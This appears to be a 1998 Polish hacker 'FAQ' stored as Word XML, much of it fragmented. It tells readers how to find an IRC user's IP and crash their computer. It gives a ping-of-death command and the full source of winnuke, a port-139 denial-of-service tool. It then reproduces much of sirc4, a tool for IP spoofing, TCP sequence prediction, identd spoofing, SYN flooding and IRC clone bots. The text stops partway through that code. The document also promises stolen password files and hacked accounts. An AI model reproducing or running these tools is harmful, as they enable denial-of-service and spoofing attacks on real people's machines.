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56" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>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G_U_L_U_M   faq-----------------                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>17.4.1998</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656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nie odpowiadam za lamerie ktora moze zrobic----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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bie krzywde korzystajac z nizej zamieszczonej----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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resci,wszystko zamieszczam tu w celach eduka-----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>----------cyjnych he he :)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656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto"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656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto"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obra moze tak jest o moj I pierwszy faq wiec </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman C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e spodziewajcie sie niczego nadzwyczajnego,</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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W wiekszosci sa tu kody zrodlowe ale coz :)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Winnuke i port 139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jak namierzac i rozpierdalac kolesi na IRC-U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sirc4 kod zrodlowy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Passwd(co robic jak juz je masz)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Troche exploitow glownie na irixa,free i open bsd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nothing special</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Troche zchackowanych kont</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Greetengs</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nnuke i port 139---</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ind w:right="-180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em ze to lamerskie ,ale w koncu faqi sa pisane dla lemeri no dobra w ramach przypomnienia winnuke jest to progs ktory wysyla na port 139 maly pakiet z syfem w efekcie prowadzi to do zaawieszenia kompa no dobra ale to tak w ramach przypomnienia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-180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ind w:right="-180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k namierzac i rozpierdalac kolesi na IRCU---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-180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ind w:right="-180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k a wiec najprostsz metoda to oczywiscie winnuke ale juz dzis malo kto jest narazony na ten atak bo wiekszosc zalatwila juz sobie antynuka ale zawsze mozna sprobowac Start:  /whois nick_kolesia powinno pojawic sie cos w tym stylu lamer@ppp84.walbrzych.tpnet.pl(dla lameri tpnet to telekomunikacja polska ;) ). no dobra teraz mam jego adres ,ale musimy przerobic to na IP najlepiej jest miec Netcopa lub inne tego typu narzedzia (nie jestem pewien ale zobaczcie www.hack.zone.to chyba nie ma co !! jak nie ma to zrobcie tak pod shitem dajcie na start uruchom wpisuj ping adres kolesia  no i wyskoczy wam cos takiego [1.1.1.1.1]- no i macie IP jak to nie podziala</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to sprobujcie jescze portfuckiem przeslac syf na 139 portfuck jest na hackzone. No i pozostaje jescze jedna metoda ping sprobujcie tak pod shitem "Start Uruchom pisz: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
        </w:rPr>
        <w:t>PING -l 65510 adres.do.spingowania.pl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="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ind w:right="-1800" w:hanging="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ind w:right="-180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 powinno wystarczyc ;) Ponizej zamieszczam kod zrodlowy jakze popularnego winnuka ;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-180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uto" w:line="240"/>
        <w:ind w:right="-180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uto" w:line="240"/>
        <w:ind w:right="-180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T HIR--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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winnuke.c - (05/07/97)  By _eci  */</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Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */</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include &lt;stdio.h&g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include &lt;string.h&g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include &lt;netdb.h&g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include &lt;netinet/in.h&g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include &lt;sys/types.h&g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include &lt;sys/socket.h&g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include &lt;unistd.h&g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define dport 139  /* Attack port: 139 is what we want */</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int x, s;</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char *str = "Bye";  /* Makes no diff */</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struct sockaddr_in addr, spoofedaddr;</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struct hostent *hos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int open_sock(int sock, char *server, int port) {</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truct sockaddr_in blah;</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truct hostent *he;</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zero((char *)&amp;blah,sizeof(blah));</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lah.sin_family=AF_INE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lah.sin_addr.s_addr=inet_addr(server);</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lah.sin_port=htons(por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f ((he = gethostbyname(server)) != NULL) {</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copy(he-&gt;h_addr, (char *)&amp;blah.sin_addr, he-&gt;h_length);</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lse {</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f ((blah.sin_addr.s_addr = inet_addr(server)) &lt; 0) {</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error("gethostbyname()");</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turn(-3);</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f (connect(sock,(struct sockaddr *)&amp;blah,16)==-1) {</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error("connec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lose(sock);</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turn(-4);</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intf("Connected to [%s:%d].\n",server,por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turn;</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void main(int argc, char *argv[]) {</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f (argc != 2) {</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intf("Usage: %s &lt;target&gt;\n",argv[0]);</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xit(0);</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f ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {</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error("socke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xit(-1);</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open_sock(s,argv[1],dpor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intf("Sending crash... ");</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end(s,str,strlen(str),MSG_OOB);</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usleep(100000);</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intf("Done!\n");</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lose(s);</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T HIR--</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godnie z rozkladem zamieszczam tu Kod zrodlowy sirca4---</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szcze go nie testowalem dopiero dzisiaj go dorwalem</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T HIR--</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re is my release of sirc4 =)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 johan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he include files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clude &lt;sys/types.h&g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clude &lt;sys/socket.h&g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clude &lt;netinet/in.h&g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clude &lt;netdb.h&g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clude &lt;stdio.h&g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clude &lt;sys/utsname.h&g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clude &lt;string.h&g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clude &lt;fcntl.h&g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clude &lt;stdarg.h&g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clude "tcpip.h"</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tandard Macro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fine MIN(x,y) (x&lt;y) ? x : y;</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fault Unreachable hos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fine UNREACHHOST "0.0.0.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his is for the clone bots, taken from a VERY useful post to oprahlus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y Avalon. I appreciate it, it's MUCH easier to cut and paste than to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rite this from scratch. I modded it a little to make it a little easier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o work with.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har *first[] =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andrew", "andy", "bevan", "bob", "cathy", "chris", "clair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amian", "dan", "danial", "dave", "david", "diana", "dian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ed", "greg", "george", "helen", "horris", "ignrid", "ian", "iai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ck", "james", "jenny", "john", "kali", "kathy", "kyle", "kyli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uren", "laura", "lisa", "mark", "mary", "melinda", "michael",</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chele", "mike", "natasha", "neil", "noel", "odo",</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ry", "phil", "phillip", "rick", "robe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an", "sue", "tammy", "tom", "tommy", "winston", "zhora",</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har *last[] =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len", "andrews", "barton", "blue", "clark", "clarke", "chang",</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row", "ewing", "dixon", "fenwick", "gowen", "grant", "gree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ream", "harris", "harvey", "howard", "hoyle", "hume", "irving",</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ckson", "jones", "lee", "lewis", "lloyd", "macleod", "marti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hews", "norris", "nelson", "osborn", "payne", "perry", "rei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berts", "salter", "seng", "simpson", "slater", "smith",</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hompson", "ung", "ubert", "vainer", "wills", "wilson", "woo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young", "zahra",</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fine NUMLAST sizeof(last)/sizeof(char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fine NUMFIRST sizeof(first)/sizeof(char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har *numbers[] = {"0","1","2","3","4","5","6","7","8","9"};</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me flags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fine FL_FLOODHOST    0x000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fine FL_SPOOFIDENTD  0x0002</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fine FL_WAITIDENTD   0x0004</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kes up a new name for the random clones/spoofs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har *newname(short i, short j)</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ar name[9];</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ort n, m;</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random() &amp; 1)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 = random() % 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strlen(first[n]) &lt; 7)</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rcpy(name, first[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random() &amp; 7) &lt; 3) &amp;&amp; strlen(name) &lt; 8)</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rncat(name, first[random() % i], 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 = random() % j;</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strlen(last[n]) &lt; 7)</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rcpy(name, last[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 = MIN(random() % 6, 8 - strlen(nam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rncpy(name, last[n], 7 - m);</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me[7-m] = '\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random() &amp; 7) &lt; 3) &amp;&amp; (strlen(name) &lt; 8))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rncat(name, first[random() % i], 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random() &amp; 7) &lt; 3) &amp;&amp; (strlen(name) &lt; 8))</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rncat(name, first[random() % i], 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ls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random() &amp; 7) &lt; 5) &amp;&amp; (strlen(name) &lt; 8))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 = random() % 1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rncat(name, numbers[m], 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m &amp;&amp; ((random() &amp; 7) &lt; 5) &amp;&amp; (strlen(name) &lt; 8))</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rncat(name, numbers[random() % 10], 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turn((char *)strdup(nam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hat the fuck do you think this function does?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oid usage(char *prognam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Usage: %s [options]\n",prognam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  -p &lt;host[:port]&gt;\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tTests the host to see if it is IP spoofable\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  -s &lt;host[:port]&gt; [&lt;unreach ip&gt;]\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tTests to see if the machine is SYN floodable\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  -o &lt;host[:port]&gt;\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tAttempts to determine the Operating System of the host\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  -i &lt;server[:port[:spport]]&gt; [&lt;nick&gt; &lt;uname@host[:fport]&gt; &lt;gecos&gt;]\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tLog onto IRC. If no nick, etc then they will be random\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  -t &lt;host ip[:port]&gt; &lt;spoof ip&gt;\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tCreate's a telnet like connection\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  -a &lt;host ip&gt; &lt;begin port&gt; &lt;end port&gt;\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tScans ports from begin to end (Like strobe but better :)\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  -c &lt;#&gt; [&lt;servers&gt; &lt;spoof ip&gt;]\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tCreate's # of clones reading information from the files specified\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tDefault = servers.list and spoofs.list\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  -w \tWait for identd port before continuing\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  -d \tAttempt to spoof identd\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  -f \tFlood the spoof'd IP\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Note: IP's can be interchanged with a hostname\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Note: Surround the gecos field with \" to preserve the spaces\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xit(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nds one string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oid sendstring(spoofrec *spoof, char *s)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spoof,CF_ACK | CF_PSH,s,strlen(s),12,2);</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turns the domain name given the IP #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har *getdomainname(struct sockaddr_in hos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ruct hostent *lookup;</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f ((lookup = gethostbyaddr((char *)&amp;host.sin_addr,sizeof(long),AF_INET)) != NULL)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turn((char *)lookup-&gt;h_nam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turn((char *)inet_ntoa(host.sin_addr));</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har *getstring(voi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ort curpos;</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ar s[81],ch;</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urpos=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hile (1)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f (fread(&amp;ch,sizeof(char),1,stdin) &lt;= 0)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ntinu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curpos++]=ch;</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ch=='\r') || (ch=='\n'))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curpos]=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urpos=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turn((char *)strdup(s));</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turn(NULL);</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har *getircstring(voi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turn(getstring());</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unsigned long determinetcpseq(short flags, struct sockaddr_in hos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unsigned short port, unsigned short *ident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rec seqpre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ng lasttim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nsigned short done,i,iport,portbas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cprec tcp;</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Using port %d as seq pred port\n",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ake a random port bas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rtbase=2000+getpi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qpred.from.sin_addr=getlocalip(host.sin_addr.s_addr);</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qpred.dest=hos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qpred.dport=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qpred.ack=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Starting sequence # prediction\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ttime=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e=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port=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hile (!don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very 2 seconds, send out a SYN packe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lasttime&lt;time(NULL))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Sending SYN request\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qpred.sport=portbase+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seqpred,CF_SYN,NULL,0,1,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ttime=time(NULL)+2;</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hile ((!done) &amp;&amp; (gettcp(&amp;seqpred,&amp;tcp)))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ntohs(tcp.dport)==113) &amp;&amp; (!ipor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port=ntohs(tcp.s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Identd port: %d\n",i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flags &amp; FL_WAITIDENTD) &amp;&amp; (seqpred.ac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e=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ntohs(tcp.dport)==seqpred.spor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tcp.hrc &amp; CF_ACK) &amp;&amp; (tcp.hrc &amp; CF_RS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Connection refused\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xit(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seqpred.ack)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Got SYN/ACK back from host\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qpred.ack=ntohl(tcp.seqnum);</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f ((!(flags &amp; FL_WAITIDENTD)) || (ipor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e=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identd != NULL)</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entd = i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turn(seqpred.ac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id sendirclogin(spoofrec *spoof, char *nick, char *username, char *gecos)</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ar s[8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string(spoof,"\n"); /* Send a blank lin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rintf(s,"NICK %s\n",nic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printf(s);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string(spoof,s); /* Then the NICK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rintf(s,"USER %s %s",username,inet_ntoa(spoof-&gt;from.sin_addr));</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rintf(s,"%s %s :%s\n",s,</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et_ntoa(spoof-&gt;dest.sin_addr),gecos);</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printf(s);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string(spoof,s); /* And then USER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rintf(s,"MODE %s +iw\n",nic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printf(s);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string(spoof,s); /* And lastly the MOD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onnects a spoof to an IRC server given the information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oid connectirc(short flags, struct sockaddr_in server, short por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char *nick, char *username, struct sockaddr_in shos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short fport, short spport, char *gecos)</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ruct sockaddr_in fhos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rec spoof, identd, floo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ort i,i1,don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nsigned short curpos,i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ar s[81],ch;</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poof the identd connection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flags &amp; FL_SPOOFIDENTD)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rver.sin_port=htons(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i=socket(AF_INET, SOCK_STREAM, 0)) &lt; 0)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ror("Opening stream socke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xit(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connect(i, (struct sockaddr *)&amp;server, sizeof(server)) &lt; 0)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ror("Connecting stream socke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xit(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ose(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resolve_host("0.0.0.1",&amp;fhost)&lt;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xit(-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lood.dest=shos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lood.from=fhos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lood.seq=spoof.seq-6400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lood.ack=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lood.dport=f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 (i=0;i&lt;50;i++)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lood.sport=10000-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flood,CF_SYN,NULL,0,1,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dest=server;</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from=shos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dport=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sport=f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seq=128000+getpi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ack=determinetcpseq(flags,server,spport,&amp;iport)+6400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ACK: %lu\n",spoof.ac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spoof,CF_SYN,NULL,0,1,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leep(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spoof,CF_ACK,NULL,0,6,2);</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ow comes the time to spoof the identd connection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flags &amp; FL_SPOOFIDENTD) &amp;&amp; (ipor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entd.from=spoof.from;</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entd.dest=spoof.des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entd.sport=113;</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entd.seq=spoof.seq+12800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Beginning identd spoofing\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 (i=0;i&lt;10;i++)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etup some variables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entd.dport=iport+i+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entd.seq+=12800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entd.ack=spoof.ack+6400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end the connection accept packe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identd,CF_SYN | CF_ACK,NULL,0,12,2);</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leep(1);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cknowledge the packet it sends us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We need to acknowledge the correct # of chars since we need to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lose this connection quickly before ircd times ou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entd.ack+=5;</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rintf(s,"%d",spoof.s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entd.ack+=strlen(s);</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rintf(s,"%d",spoof.d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entd.ack+=strlen(s);</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identd,CF_ACK,NULL,0,12,2);</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ake our packet confirming our identity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rintf(s,"%hu, %hu : USERID : UNIX : %s\r\n",spoof.sport,spoof.dport,usernam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string(&amp;identd,s);</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leep(1);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nd close the connection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identd,CF_FIN | CF_ACK,NULL,0,12,2);</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entd.seq++;</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entd.ac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identd,CF_FIN | CF_ACK,NULL,0,12,2);</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leep(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irclogin(&amp;spoof,nick,username,gecos);</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while (1)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string(&amp;spoof,getircstring());</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id connecttelnet(short flags, struct sockaddr_in server, short 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ruct sockaddr_in shos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rec spoof, ident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ort i,i1,don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nsigned short curpos,i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ar s[81],ch;</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etup the structure and determine the TCP seq #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dest=server;</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from=shos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dport=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sport=1234+getpi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seq=128000+getpi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ack=determinetcpseq(flags,server,port,&amp;iport)+6400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ACK: %lu\n",spoof.ac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tart up the connection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spoof,CF_SYN,NULL,0,1,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leep(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spoof,CF_ACK,NULL,0,6,2);</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leep(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end a \n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string(&amp;spoof,"\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end shi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hile (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string(&amp;spoof,getstring());</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id connectclones(short flags, short numclones, char *serverfn, char *spooff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rec *clones,seqpre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ar *nickname,s[81],*p;</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ort i,i1,j,k,done,portbase,clonenum,from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ng begintime,lasttim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LE *serverl, *spoofl;</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cprec tcp;</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omport=1024+getpi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fromport&lt;1024)</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omport+=1024;</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ones=(spoofrec *)malloc(sizeof(spoofrec)*numclones);</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rverl=fopen(serverfn,"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l=fopen(spooffn,"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rtbase=(rand()%1000)+1024;</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 (clonenum=0;clonenum&lt;numclones;)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0]=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hile (!s[0])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gets(s,81,serverl);</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feof(serverl))</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wind(serverl);</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strlen(s)-1]=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p=strchr(s,':'))!=NULL)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qpred.dport=atoi(p+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ls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qpred.dport=6667;</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resolve_host(s,&amp;seqpred.dest)&lt;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xit(-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qpred.from.sin_addr=getlocalip(seqpred.dest.sin_addr.s_addr);</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gintime=time(NULL)+1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ttime=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e=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Determining seq #'s for server %s\n",s);</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hile (!don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very 2 seconds, send out a SYN packe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lasttime&lt;time(NULL))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qpred.sport=portbas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seqpred,CF_SYN,NULL,0,1,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rtbas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ttime=time(NULL)+2;</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hile ((gettcp(&amp;seqpred,&amp;tcp)) &amp;&amp; (!don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ntohs(tcp.dport)==ntohs(seqpred.spor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tcp.hrc &amp; CF_ACK) &amp;&amp; (tcp.hrc &amp; CF_RS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Connection refused\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xit(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qpred.ack=ntohl(tcp.seqnum);</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e=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begintime&lt;time(NULL))</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while (!don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1=(5 &lt; (numclones-clonenum)) ? 5 : (numclones-clonenum);</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 (i=0;i&lt;i1;i++)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0]=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hile (!s[0])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gets(s,81,spoofl);</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feof(spoofl))</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wind(spoofl);</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strlen(s)-1]=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resolve_host(s,&amp;clones[clonenum+i].from)&lt;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xit(-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Creating connection for clone #%d from 